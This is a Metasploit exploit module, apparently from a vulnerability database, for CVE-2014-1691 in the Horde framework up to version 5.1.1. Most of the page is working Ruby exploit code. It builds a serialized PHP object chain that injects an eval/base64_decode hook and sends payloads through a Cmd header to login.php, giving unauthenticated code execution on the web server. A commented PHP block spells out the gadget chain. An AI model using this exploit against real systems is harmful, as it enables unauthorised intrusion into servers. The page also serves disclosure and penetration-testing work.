Horde Framework Unserialize PHP Code Execution

2014-03-18T01:47:45
ID MSF:EXPLOIT/UNIX/WEBAPP/HORDE_UNSERIALIZE_EXEC
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

This module exploits a php unserialize() vulnerability in Horde <= 5.1.1 which could be abused to allow unauthenticated users to execute arbitrary code with the permissions of the web server. The dangerous unserialize() exists in the 'lib/Horde/Variables.php' file. The exploit abuses the __destruct() method from the Horde_Kolab_Server_Decorator_Clean class to reach a dangerous call_user_func() call in the Horde_Prefs class.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule &lt; Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           =&gt; 'Horde Framework Unserialize PHP Code Execution',
      'Description'    =&gt; %q{
        This module exploits a php unserialize() vulnerability in Horde &lt;= 5.1.1 which could be
        abused to allow unauthenticated users to execute arbitrary code with the permissions of
        the web server. The dangerous unserialize() exists in the 'lib/Horde/Variables.php' file.
        The exploit abuses the __destruct() method from the Horde_Kolab_Server_Decorator_Clean
        class to reach a dangerous call_user_func() call in the Horde_Prefs class.
      },
      'Author'         =&gt;
        [
          'EgiX', # Exploitation technique and Vulnerability discovery (originally reported by the vendor)
          'juan vazquez' # Metasploit module
        ],
      'License'        =&gt; MSF_LICENSE,
      'References'     =&gt;
        [
          [ 'CVE', '2014-1691' ],
          [ 'URL', 'http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection' ],
          [ 'URL', 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=737149' ],
          [ 'URL', 'https://github.com/horde/horde/commit/da6afc7e9f4e290f782eca9dbca794f772caccb3' ]
        ],
      'Privileged'     =&gt; false,
      'Platform'       =&gt; ['php'],
      'Arch'           =&gt; ARCH_PHP,
      'Payload'        =&gt;
        {
          'DisableNops' =&gt; true
        },
      'Targets'        =&gt; [ ['Horde 5', { }], ],
      'DefaultTarget'  =&gt; 0,
      'DisclosureDate' =&gt; 'Jun 27 2013'
      ))

      register_options(
        [
          OptString.new('TARGETURI', [ true, "The base path to Horde", "/horde/"])
        ])
  end

  def check
    flag = rand_text_alpha(rand(10)+20)
    res = send_request_exploit("print #{flag};die;")
    if res and res.body and res.body.to_s =~ /#{flag}/
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    print_status("Testing injection...")
    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, "#{peer} - Target isn't vulnerable, exiting...")
    end

    print_status("Exploiting the unserialize()...")
    send_request_exploit(payload.encoded)
  end

  def send_request_exploit(p)
    php_injection = "eval(base64_decode($_SERVER[HTTP_CMD]));die();"

    payload_serialized = "O:34:\"Horde_Kolab_Server_Decorator_Clean\":2:{s:43:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_server\";"
    payload_serialized &lt;&lt; "O:20:\"Horde_Prefs_Identity\":2:{s:9:\"\x00*\x00_prefs\";O:11:\"Horde_Prefs\":2:{s:8:\"\x00*\x00_opts\";a:1:{s:12:\"sizecallback\";"
    payload_serialized &lt;&lt; "a:2:{i:0;O:12:\"Horde_Config\":1:{s:13:\"\x00*\x00_oldConfig\";s:#{php_injection.length}:\"#{php_injection}\";}i:1;s:13:\"readXMLConfig\";}}"
    payload_serialized &lt;&lt; "s:10:\"\x00*\x00_scopes\";a:1:{s:5:\"horde\";O:17:\"Horde_Prefs_Scope\":1:{s:9:\"\x00*\x00_prefs\";a:1:{i:0;i:1;}}}}"
    payload_serialized &lt;&lt; "s:13:\"\x00*\x00_prefnames\";a:1:{s:10:\"identities\";i:0;}}s:42:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_added\";a:1:{i:0;i:1;}}"

    send_request_cgi(
      {
        'uri'       =&gt; normalize_uri(target_uri.path.to_s, "login.php"),
        'method'    =&gt; 'POST',
        'vars_post' =&gt; {
          '_formvars' =&gt; payload_serialized
        },
        'headers' =&gt; {
          'Cmd' =&gt; Rex::Text.encode_base64(p)
        }
      })
  end
end

=begin

PHP chain by EgiX: http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection

class Horde_Config
{
   protected $_oldConfig = "phpinfo();die;";
}

class Horde_Prefs_Scope
{
   protected $_prefs = array(1);
}

class Horde_Prefs
{
   protected $_opts, $_scopes;

   function __construct()
   {
      $this-&gt;_opts['sizecallback'] = array(new Horde_Config, 'readXMLConfig');
      $this-&gt;_scopes['horde'] = new Horde_Prefs_Scope;
   }
}

class Horde_Prefs_Identity
{
   protected $_prefs, $_prefnames;

   function __construct()
   {
      $this-&gt;_prefs = new Horde_Prefs;
      $this-&gt;_prefnames['identities'] = 0;
   }
}

class Horde_Kolab_Server_Decorator_Clean
{
   private $_server, $_added = array(1);

   function __construct()
   {
      $this-&gt;_server = new Horde_Prefs_Identity;
   }
}

$popchain = serialize(new Horde_Kolab_Server_Decorator_Clean);

=end